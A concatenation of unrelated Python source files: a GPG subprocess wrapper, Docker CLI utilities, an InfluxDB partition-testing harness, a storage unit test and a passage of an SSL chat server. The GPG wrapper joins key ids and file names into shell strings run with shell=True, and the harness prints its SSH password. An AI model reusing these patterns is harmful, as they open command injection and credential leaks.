self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class GPG(object):
decode_errors = 'strict'
result_map = {
'crypt': Crypt,
'delete': DeleteResult,
'generate': GenKey,
'import': ImportResult,
'list': ListKeys,
'sign': Sign,
'verify': Verify,
}
"Encapsulate access to the gpg executable"
def __init__(self, gpgbinary='gpg', gnupghome=None, verbose=False,
use_agent=False, keyring=None):
"""Initialize a GPG process wrapper. Options are:
gpgbinary -- full pathname for GPG binary.
gnupghome -- full pathname to where we can find the public and
private keyrings. Default is whatever gpg defaults to.
keyring -- name of alternative keyring file to use. If specified,
the default keyring is not used.
"""
self.gpgbinary = gpgbinary
self.gnupghome = gnupghome
self.keyring = keyring
self.verbose = verbose
self.use_agent = use_agent
self.encoding = locale.getpreferredencoding()
if self.encoding is None: # This happens on Jython!
self.encoding = sys.stdin.encoding
if gnupghome and not os.path.isdir(self.gnupghome):
os.makedirs(self.gnupghome,0x1C0)
p = self._open_subprocess(["--version"])
result = self.result_map['verify'](self) # any result will do for this
self._collect_output(p, result, stdin=p.stdin)
if p.returncode != 0:
raise ValueError("Error invoking gpg: %s: %s" % (p.returncode,
result.stderr))
def _open_subprocess(self, args, passphrase=False):
# Internal method: open a pipe to a GPG subprocess and return
# the file objects for communicating with it.
cmd = [self.gpgbinary, '--status-fd 2 --no-tty']
if self.gnupghome:
cmd.append('--homedir "%s" ' % self.gnupghome)
if self.keyring:
cmd.append('--no-default-keyring --keyring "%s" ' % self.keyring)
if passphrase:
cmd.append('--batch --passphrase-fd 0')
if self.use_agent:
cmd.append('--use-agent')
cmd.extend(args)
cmd = ' '.join(cmd)
if self.verbose:
print(cmd)
logger.debug("%s", cmd)
return Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def _read_response(self, stream, result):
# Internal method: reads all the stderr output from GPG, taking notice
# only of lines that begin with the magic [GNUPG:] prefix.
#
# Calls methods on the response object for each valid token found,
# with the arg being the remainder of the status line.
lines = []
while True:
line = stream.readline()
if len(line) == 0:
break
lines.append(line)
line = line.rstrip()
if self.verbose:
print(line)
logger.debug("%s", line)
if line[0:9] == '[GNUPG:] ':
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
result.handle_status(keyword, value)
result.stderr = ''.join(lines)
def _read_data(self, stream, result):
# Read the contents of the file from GPG's stdout
chunks = []
while True:
data = stream.read(1024)
if len(data) == 0:
break
logger.debug("chunk: %r" % data[:256])
chunks.append(data)
if _py3k:
# Join using b'' or '', as appropriate
result.data = type(data)().join(chunks)
else:
result.data = ''.join(chunks)
def _collect_output(self, process, result, writer=None, stdin=None):
"""
Drain the subprocesses output streams, writing the collected output
to the result. If a writer thread (writing to the subprocess) is given,
make sure it's joined before returning. If a stdin stream is given,
close it before returning.
"""
stderr = codecs.getreader(self.encoding)(process.stderr)
rr = threading.Thread(target=self._read_response, args=(stderr, result))
rr.setDaemon(True)
logger.debug('stderr reader: %r', rr)
rr.start()
stdout = process.stdout
dr = threading.Thread(target=self._read_data, args=(stdout, result))
dr.setDaemon(True)
logger.debug('stdout reader: %r', dr)
dr.start()
dr.join()
rr.join()
if writer is not None:
writer.join()
process.wait()
if stdin is not None:
try:
stdin.close()
except IOError:
pass
stderr.close()
stdout.close()
def _handle_io(self, args, file, result, passphrase=None, binary=False):
"Handle a call to GPG - pass input data, collect output data"
# Handle a basic data call - pass data to GPG, handle the output
# including status information. Garbage In, Garbage Out :)
p = self._open_subprocess(args, passphrase is not None)
if not binary:
stdin = codecs.getwriter(self.encoding)(p.stdin)
else:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
self._collect_output(p, result, writer, stdin)
return result
#
# SIGNATURE METHODS
#
def sign(self, message, **kwargs):
"""sign message"""
f = _make_binary_stream(message, self.encoding)
result = self.sign_file(f, **kwargs)
f.close()
return result
def sign_file(self, file, keyid=None, passphrase=None, clearsign=True,
detach=False, binary=False):
"""sign file"""
logger.debug("sign_file: %s", file)
if binary:
args = ['-s']
else:
args = ['-sa']
# You can't specify detach-sign and clearsign together: gpg ignores
# the detach-sign in that case.
if detach:
args.append("--detach-sign")
elif clearsign:
args.append("--clearsign")
if keyid:
args.append('--default-key "%s"' % keyid)
result = self.result_map['sign'](self)
#We could use _handle_io here except for the fact that if the
#passphrase is bad, gpg bails and you can't write the message.
p = self._open_subprocess(args, passphrase is not None)
try:
stdin = p.stdin
if passphrase:
_write_passphrase(stdin, passphrase, self.encoding)
writer = _threaded_copy_data(file, stdin)
except IOError:
logging.exception("error writing message")
writer = None
self._collect_output(p, result, writer, stdin)
return result
def verify(self, data):
"""Verify the signature on the contents of the string 'data'
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(Passphrase='foo')
>>> key = gpg.gen_key(input)
>>> assert key
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='bar')
>>> assert not sig
>>> sig = gpg.sign('hello',keyid=key.fingerprint,passphrase='foo')
>>> assert sig
>>> verify = gpg.verify(sig.data)
>>> assert verify
"""
f = _make_binary_stream(data, self.encoding)
result = self.verify_file(f)
f.close()
return result
def verify_file(self, file, data_filename=None):
"Verify the signature on the contents of the file-like object 'file'"
logger.debug('verify_file: %r, %r', file, data_filename)
result = self.result_map['verify'](self)
args = ['--verify']
if data_filename is None:
self._handle_io(args, file, result, binary=True)
else:
logger.debug('Handling detached verification')
import tempfile
fd, fn = tempfile.mkstemp(prefix='pygpg')
s = file.read()
file.close()
logger.debug('Wrote to temp file: %r', s)
os.write(fd, s)
os.close(fd)
args.append(fn)
args.append('"%s"' % data_filename)
try:
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
finally:
os.unlink(fn)
return result
#
# KEY MANAGEMENT
#
def import_keys(self, key_data):
""" import the key_data into our keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkey1 = gpg.export_keys(print1)
>>> seckey1 = gpg.export_keys(print1,secret=True)
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> str(gpg.delete_keys(print1))
'Must delete secret key first'
>>> str(gpg.delete_keys(print1,secret=True))
'ok'
>>> str(gpg.delete_keys(print1))
'ok'
>>> str(gpg.delete_keys("nosuchkey"))
'No such key'
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert not print1 in seckeys.fingerprints
>>> assert not print1 in pubkeys.fingerprints
>>> result = gpg.import_keys('foo')
>>> assert not result
>>> result = gpg.import_keys(pubkey1)
>>> pubkeys = gpg.list_keys()
>>> seckeys = gpg.list_keys(secret=True)
>>> assert not print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> result = gpg.import_keys(seckey1)
>>> assert result
>>> seckeys = gpg.list_keys(secret=True)
>>> pubkeys = gpg.list_keys()
>>> assert print1 in seckeys.fingerprints
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
result = self.result_map['import'](self)
logger.debug('import_keys: %r', key_data[:256])
data = _make_binary_stream(key_data, self.encoding)
self._handle_io(['--import'], data, result, binary=True)
logger.debug('import_keys result: %r', result.__dict__)
data.close()
return result
def recv_keys(self, keyserver, *keyids):
"""Import a key from a keyserver
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> result = gpg.recv_keys('pgp.mit.edu', '3FF0DB166A7476EA')
>>> assert result
"""
result = self.result_map['import'](self)
logger.debug('recv_keys: %r', keyids)
data = _make_binary_stream("", self.encoding)
#data = ""
args = ['--keyserver', keyserver, '--recv-keys']
args.extend(keyids)
self._handle_io(args, data, result, binary=True)
logger.debug('recv_keys result: %r', result.__dict__)
data.close()
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ['--batch --delete-%s "%s"' % (which, fingerprints)]
result = self.result_map['delete'](self)
p = self._open_subprocess(args)
self._collect_output(p, result, stdin=p.stdin)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(['"%s"' % k for k in keyids])
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = self.result_map['delete'](self) # any result will do
self._collect_output(p, result, stdin=p.stdin)
logger.debug('export_keys result: %r', result.data)
return result.data.decode(self.encoding, self.decode_errors)
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which,)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = self.result_map['list'](self)
self._collect_output(p, result, stdin=p.stdin)
lines = result.data.decode(self.encoding,
self.decode_errors).splitlines()
valid_keywords = 'pub uid sec fpr'.split()
for line in lines:
if self.verbose:
print(line)
logger.debug("line: %r", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = self.result_map['generate'](self)
f = _make_binary_stream(input, self.encoding)
self._handle_io(args, f, result, binary=True)
f.close()
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None, symmetric=False):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
if symmetric:
args = ['--symmetric']
else:
args = ['--encrypt']
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient "%s"' % recipient)
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if sign:
args.append('--sign --default-key "%s"' % sign)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase=passphrase, binary=True)
logger.debug('encrypt result: %r', result.data)
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'need passphrase'
True
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status in ('decryption failed', 'bad passphrase')
True
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status == 'need passphrase'
True
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == print1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output "%s"' % output)
if always_trust:
args.append("--always-trust")
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
|
utils.py
|
import subprocess
import warnings
from pathlib import Path
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
from typing import Any, Dict, Iterable, List, Optional, Tuple, Union
import pydantic
from python_on_whales.download_binaries import download_buildx
PROJECT_ROOT = Path(__file__).parents[1]
def title_if_necessary(string: str):
if string.isupper():
return string
else:
return string.title()
def to_docker_camel(string):
try:
special_cases = {
"exec_ids": "ExecIDs",
"sandbox_id": "SandboxID",
"oom_killed": "OOMKilled",
"rw": "RW",
"link_local_ipv6_address": "LinkLocalIPv6Address",
"link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen",
"secondary_ipv6_addresses": "SecondaryIPv6Addresses",
"endpoint_id": "EndpointID",
"global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen",
"ip_adress": "IPAddress",
"ip_prefix_lenght": "IPPrefixLen",
"ipv6_gateway": "IPv6Gateway",
"network_id": "NetworkID",
"ip_address": "IPAddress",
"global_ipv6_address": "GlobalIPv6Address",
"blkio_device_read_iops": "BlkioDeviceReadIOps",
"blkio_device_write_iops": "BlkioDeviceWriteIOps",
"device_ids": "DeviceIDs",
"kernel_memory_tcp": "KernelMemoryTCP",
"container_id_file": "ContainerIDFile",
"uts_mode": "UTSMode",
"root_fs": "RootFS",
"enable_ipv6": "EnableIPv6",
"ipv4_address": "IPv4Address",
"ipv6_address": "IPv6Address",
"ipam": "IPAM",
"tls_info": "TLSInfo",
"virtual_ips": "VirtualIPs",
}
return special_cases[string]
except KeyError:
return "".join(title_if_necessary(x) for x in string.split("_"))
class DockerCamelModel(pydantic.BaseModel):
class Config:
alias_generator = to_docker_camel
allow_population_by_field_name = True
class DockerException(Exception):
def __init__(
self,
command_launched: List[str],
return_code: int,
stdout: Optional[bytes] = None,
stderr: Optional[bytes] = None,
):
command_launched_str = " ".join(command_launched)
error_msg = (
f"The docker command executed was `{command_launched_str}`.\n"
f"It returned with code {return_code}\n"
)
if stdout is not None:
error_msg += f"The content of stdout is '{stdout.decode()}'\n"
else:
error_msg += (
"The content of stdout can be found above the "
"stacktrace (it wasn't captured).\n"
)
if stderr is not None:
error_msg += f"The content of stderr is '{stderr.decode()}'\n"
else:
error_msg += (
"The content of stderr can be found above the "
"stacktrace (it wasn't captured)."
)
super().__init__(error_msg)
def run(
args: List[Any],
capture_stdout: bool = True,
capture_stderr: bool = True,
input: bytes = None,
return_stderr: bool = False,
env: Dict[str, str] = {},
) -> Union[str, Tuple[str, str]]:
args = [str(x) for x in args]
if args[1] == "buildx":
install_buildx_if_needed(args[0])
env["DOCKER_CLI_EXPERIMENTAL"] = "enabled"
if env == {}:
env = None
if capture_stdout:
stdout_dest = subprocess.PIPE
else:
stdout_dest = None
if capture_stderr:
stderr_dest = subprocess.PIPE
else:
stderr_dest = None
completed_process = subprocess.run(
args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=env
)
if completed_process.returncode != 0:
raise DockerException(
args,
completed_process.returncode,
completed_process.stdout,
completed_process.stderr,
)
if return_stderr:
return (
post_process_stream(completed_process.stdout),
post_process_stream(completed_process.stderr),
)
else:
return post_process_stream(completed_process.stdout)
def post_process_stream(stream: Optional[bytes]):
if stream is None:
return ""
stream = stream.decode()
if len(stream) != 0 and stream[-1] == "\n":
stream = stream[:-1]
return stream
ValidPath = Union[str, Path]
def to_list(x) -> list:
if isinstance(x, list):
return x
else:
return [x]
# backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix
def removesuffix(string: str, suffix: str) -> str:
if string.endswith(suffix):
return string[: -len(suffix)]
else:
return string
def removeprefix(string: str, prefix: str) -> str:
if string.startswith(prefix):
return string[len(prefix) :]
else:
return string
def install_buildx_if_needed(docker_binary: str):
completed_process = subprocess.run(
[docker_binary, "buildx"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env={"DOCKER_CLI_EXPERIMENTAL": "enabled"},
)
if completed_process.returncode == 0:
return
stderr = completed_process.stderr.decode()
if "is not a docker command" in stderr:
warnings.warn(
"It seems that docker buildx is not installed on your system. \n"
"It's going to be downloaded for you. It's only a one time thing."
"The next calls to the buildx command won't trigger the "
"download again."
)
download_buildx()
else:
raise RuntimeError(
f"It seems buildx is not properly installed. When running "
f"'docker buildx', here is the result:\n"
f"{stderr}"
)
def reader(pipe, pipe_name, queue):
try:
with pipe:
for line in iter(pipe.readline, b""):
queue.put((pipe_name, line))
finally:
queue.put(None)
def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]:
full_cmd = list(map(str, full_cmd))
process = Popen(full_cmd, stdout=PIPE, stderr=PIPE)
q = Queue()
full_stderr = b"" # for the error message
Thread(target=reader, args=[process.stdout, "stdout", q]).start()
Thread(target=reader, args=[process.stderr, "stderr", q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
yield source, line
if source == "stderr":
full_stderr += line
exit_code = process.wait()
if exit_code != 0:
raise DockerException(full_cmd, exit_code, stderr=full_stderr)
def format_dict_for_cli(dictionary: Dict[str, str], separator="="):
return [f"{key}{separator}{value}" for key, value in dictionary.items()]
def read_env_file(env_file: Path) -> Dict[str, str]:
result_dict = {}
for line in env_file.read_text().splitlines():
line = line.strip()
try:
first_sharp = line.index("#")
except ValueError:
pass
else:
line = line[:first_sharp]
if not line:
continue
line = line.strip()
key, value = line.split("=")
result_dict[key] = value
return result_dict
def read_env_files(env_files: List[Path]) -> Dict[str, str]:
result_dict = {}
for file in env_files:
result_dict.update(read_env_file(file))
return result_dict
|
influxenv.py
|
import time
import spur
import json
import logging
import pycurl
import threading
from StringIO import StringIO
errorRetry = 50
numThreads = 20
testDelayAdder = 10
class InfluxEnv(object):
def __init__(self,ip1,ip2,ip3,username,password,pem):
self.errorRetry = errorRetry
self.numThreads = numThreads
self.testDelayAdder = testDelayAdder
self.ip = [ "", ip1, ip2, ip3 ]
if username is None:
self.username = ""
else:
self.username = username
if password is None:
self.password = ""
else:
self.password = password
if pem is None:
self.pem = ""
else:
self.pem = pem
self.datetime = time.strftime("%Y_%m_%dT%H_%M_%S", time.gmtime())
self.db = 'run_' + self.datetime
logging.basicConfig(filename='/tmp/'+self.db,level=logging.INFO)
logging.info(self.db)
logging.info("")
def testLogBanner(self,test_name):
logging.info("")
logging.info("Test: "+test_name)
logging.info("----------------------------------------------------------------------------------------")
logging.info("")
def executeCommand(self,node,command,pause):
logging.info("executeCommand")
logging.info("Node: "+str(node))
logging.info(command)
result_text = ""
try:
if len(self.password) > 0:
shell = spur.SshShell(hostname=self.ip[node],username=self.username,password=self.password)
else:
shell = spur.SshShell(hostname=self.ip[node],username=self.username,private_key_file=self.pem)
with shell:
result = shell.run(command)
result_text = result.output
#print result.output
except spur.results.RunProcessError:
pass
logging.info("Result:"+result_text)
time.sleep(pause+self.testDelayAdder)
return result_text
def stopInflux(self,node):
logging.info("stopInflux")
self.executeCommand(node,["sudo","service","influxdb","stop"],2)
def startInflux(self,node):
logging.info("startInflux")
self.executeCommand(node,["sudo","service","influxdb","start"],8)
def killInflux(self,node):
logging.info("killInflux")
self.executeCommand(node,["sudo","pkill","influxdb"],1)
def createDB(self):
logging.info("createDB")
self.executeCommand(1,["sh","-c",'curl -G http://localhost:8086/query --data-urlencode "q=CREATE DATABASE ' + self.db + '"'],0)
self.executeCommand(1,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "q=CREATE RETENTION POLICY mypolicy ON ' + self.db + ' DURATION 90d REPLICATION 3 DEFAULT"'],0)
print "DB Name:", self.db
def allPartitionStart(self):
for n in range(1,3):
self.partitionStart(n)
def partitionStart(self,node):
self.executeCommand(node,["sudo","ufw","allow","22"],2)
self.executeCommand(node,["sh","-c","echo y | sudo ufw enable"],2)
def allPartitionStop(self):
for n in range(1,3):
self.partitionStop(n)
def partitionStop(self,node):
self.executeCommand(node,["sh","-c","echo y | sudo ufw reset"],2)
def fullyPartitionNode(self,node):
#This fully partitions a node away from everything
self.executeCommand(node,["sudo","ufw","deny","8086"],2)
self.executeCommand(node,["sudo","ufw","deny","out","8086"],2)
def singlePartitionNode(self,node1,node2):
#This is just between 2 nodes, not from everything
self.executeCommand(node1,["sudo","ufw","deny","from",self.ip[node2],"to","any","port","8086"],2)
self.executeCommand(node1,["sudo","ufw","deny","out","from",self.ip[node2],"to","any","port","8086"],2)
def unidirectionalSinglePartitionNode(self,node1,node2):
#This is just between 2 nodes, not from everything; unidirectional, node1 cannot receive from node2
self.executeCommand(node1,["sudo","ufw","deny","from",self.ip[node2],"to","any","port","8086"],2)
def sendSingleMetric(self,node,tsname,value):
logging.info("sendSingleMetric")
for i in range(0,self.errorRetry):
result = self.executeCommand(node,["sh","-c",'curl -X POST http://localhost:8086/write -d \' { "database": "' + self.db + '", "retentionPolicy": "mypolicy", "points": [ { "name": "' + tsname + '", "fields": { "value": ' + str(value) + ' } } ] }\''],2)
if result.find("error") != -1:
time.sleep(10)
continue
break
def sendMultipleMetricsThread(self,url,payload,count):
for i in range(0,count):
for j in range(0,self.errorRetry):
cbuffer = StringIO()
c = pycurl.Curl()
c.setopt(pycurl.URL,url )
c.setopt(pycurl.HTTPHEADER, ['X-Postmark-Server-Token: API_TOKEN_HERE','Accept: application/json'])
c.setopt(pycurl.POST, 1)
c.setopt(c.WRITEDATA, cbuffer)
c.setopt(pycurl.POSTFIELDS, payload)
c.perform()
# if len(cbuffer.getvalue()) >0: print buffer.getvalue()
c.close()
if cbuffer.getvalue().find("error") != -1:
# logging.info("sendMultipleMetricsThread: Error Retry "+j)
if j >= self.errorRetry - 1:
logging.info("sendMultipleMetricsThread: Max Error Retry Failure")
time.sleep(1)
continue
break
def sendMultipleMetrics(self,node,tsname,count):
logging.info("sendMultipleMetrics")
payload = '{ "database": "' + self.db + '", "retentionPolicy": "mypolicy", "points": [ { "name": "' + tsname + '", "fields": { "value": -1 }}]}'
url = 'http://' + self.ip[node] + ':8086/write'
countForThread = int(count / self.numThreads)
threadList = []
for i in range(0,self.numThreads):
t = threading.Thread(target=self.sendMultipleMetricsThread, args=(url,payload,countForThread))
t.start()
threadList.append(t)
for t in threadList:
t.join()
def listMetrics(self,node,tsname):
logging.info("listMetrics")
return self.executeCommand(node,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "db=' + self.db + '" --data-urlencode "q=SELECT * FROM ' + tsname + '"'],0)
def countMetrics(self,node,tsname):
logging.info("countMetrics")
for i in range(0,self.errorRetry):
result = self.executeCommand(node,["sh","-c",'curl -G http://localhost:8086/query?pretty=true --data-urlencode "db=' + self.db + '" --data-urlencode "q=SELECT count(value) FROM ' + tsname + '"'],0)
if result.find("error") != -1:
time.sleep(10)
continue
j = json.loads(result)
return j['results'][0]['series'][0]['values'][0][1]
return -1 #bogus count value to indicate error
# def copyFile(self,node,filename):
# shell = spur.SshShell(hostname=self.ip[node],username=self.username,private_key_file=self.pem)
# with shell.open("/tmp","r") as remote_file
# with open(".","w") as local_file
# shutil.copyfileobj(remote_file,local_file)
# pass
def printDebug(self):
print self.ip[1],self.ip[2],self.ip[3],self.username,self.password,self.pem
|
test_core.py
|
#
# SensApp::Storage
#
# Copyright (C) 2018 SINTEF Digital
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
#
from unittest import TestCase
from mock import MagicMock
from threading import Thread
from storage.settings import Settings, Command
from storage.ui import UI
from storage.core import Storage
from storage.sensapp import Registry
from tests.fakes import FakeQueueFactory, FakeDBFactory
class StorageTests(TestCase):
def setUp(self):
self._settings = Settings.defaults()
self._ui = MagicMock(UI)
self._queue_factory = FakeQueueFactory()
self._db_factory = FakeDBFactory()
self._registry = MagicMock()
self._storage = Storage(settings=self._settings,
ui=self._ui,
queue=self._queue_factory,
db=self._db_factory,
registry=lambda *args, **kwargs: self._registry)
self._consumer = None
def test_calls_db_when_sensor_is_known(self):
self._registry.knows = MagicMock(return_value=True)
self._start_storage()
self._send_request(b"[ { \"measurement\": \"sensor_3\" } ]")
self._stop_queue()
self.assertEqual(self._db_factory.db.store.call_count, 1)
self.assertEqual(self._registry.knows.call_count, 1)
def test_do_not_call_db_when_sensor_is_not_known(self):
self._registry.knows = MagicMock(return_value=False)
self._start_storage()
self._send_request(b"[ { \"measurement\": \"sensor_3\" } ]")
self._stop_queue()
self.assertEqual(self._db_factory.db.store.call_count, 0)
self.assertEqual(self._registry.knows.call_count, 1)
def _start_storage(self):
def do_start():
self._storage.store()
self._consumer = Thread(target=do_start)
self._consumer.start()
def _send_request(self, body):
from time import sleep
#print("Sending ", body, "...")
sleep(1)
self._queue_factory.queue.accept_task(body)
def _stop_queue(self):
self._queue_factory.queue.stop()
self._consumer.join()
|
servidor.py
|
import ssl
import threading
import socket
from client import client
from database import *
from private_message import *
#import functools as fun
#import asyncio
host = '192.168.2.26'
port = 4004
clients = []
online_client_sockets = [SSLSocket]
def broadcast(client_sender:client,message:str) -> None:
try:
message_with_sign = message + ".__." + client_sender.sign_key()
#print(message_with_sign)
for cliente in clients:
if cliente.name != client_sender.name:
cliente.send_message(("globalMSG"+client_sender.name + " -> " + message_with_sign).encode())
except Exception as e:
print(e.args)
# Function to handle clients'connections
def handle_client(client:SSLSocket) -> None:
while True:
try:
message = client.recv(1024).decode()
if parseInput(message,client):
raise Exception("Fim de conversa")
except Exception as e:
print(e.args)
for client_inside in clients:
if client_inside.socket_info == client:
clients.remove(client_inside)
break
client.close()
#print(list(map(lambda x : "nome->: "+ x.name ,clients)))
break
def parseInput(message:str,client_socket:SSLSocket) -> bool:
try:
client_user:client = None
#print(f"conteudo: {message}")
if message.find("register") != -1:
#print("REGISTO")
#print(message)
create_user_db(message.removeprefix("register"),client_socket)
return False
elif message.find("login") != -1:
client_user:client = login_client(message,client_socket)
lock = threading.Lock()
lock.acquire()
for cl in clients:
# print(cl.name)
if cl.name == client_user.name:
lock.release()
return False
#print(f"Nome do individuo: {client_user.name}")
clients.append(client_user)
#print(list(map(lambda x: f"Nome do individuo: {x.name}",clients)))
#print("OLA")
lock.release()
return False
elif message.find("getsalt") != -1:
#print(f"conteudo: {message}")
get_salt(message.split(".__.")[1],client_socket)
return False
else:
#print(message)
try:
splitted = message.split('.|||.')
usrname = splitted[0]
message = splitted[1]
#print(usrname)
#print(message)
client_user = get_client(usrname,client_socket)
for cl in clients:
if cl.name == client_user.name:
cl.socket_info = client_user.socket_info
except Exception as e:
print("antes dos ifs")
print(message)
print(e.args)
if message.find("startGROUP") != -1:
try:
message = message.removeprefix("startGROUP")
#print(message)
messages = message.split(".__.")
members_names = messages[0:-2]
group_name = messages[-2]
signature = messages[-1]
#print(group_name)
#print(members_names)
hand_shake_point_2_point(members_names,client_user,clients,group_name,signature)
return False
except Exception as e:
print("STARTGROUP ERROR")
print(e.args)
elif message.find("privateMSG") != -1:
try:
#print(f"msg: {message}")
talk(message.removeprefix("privateMSG"),client_user,clients)
#print("FIND")
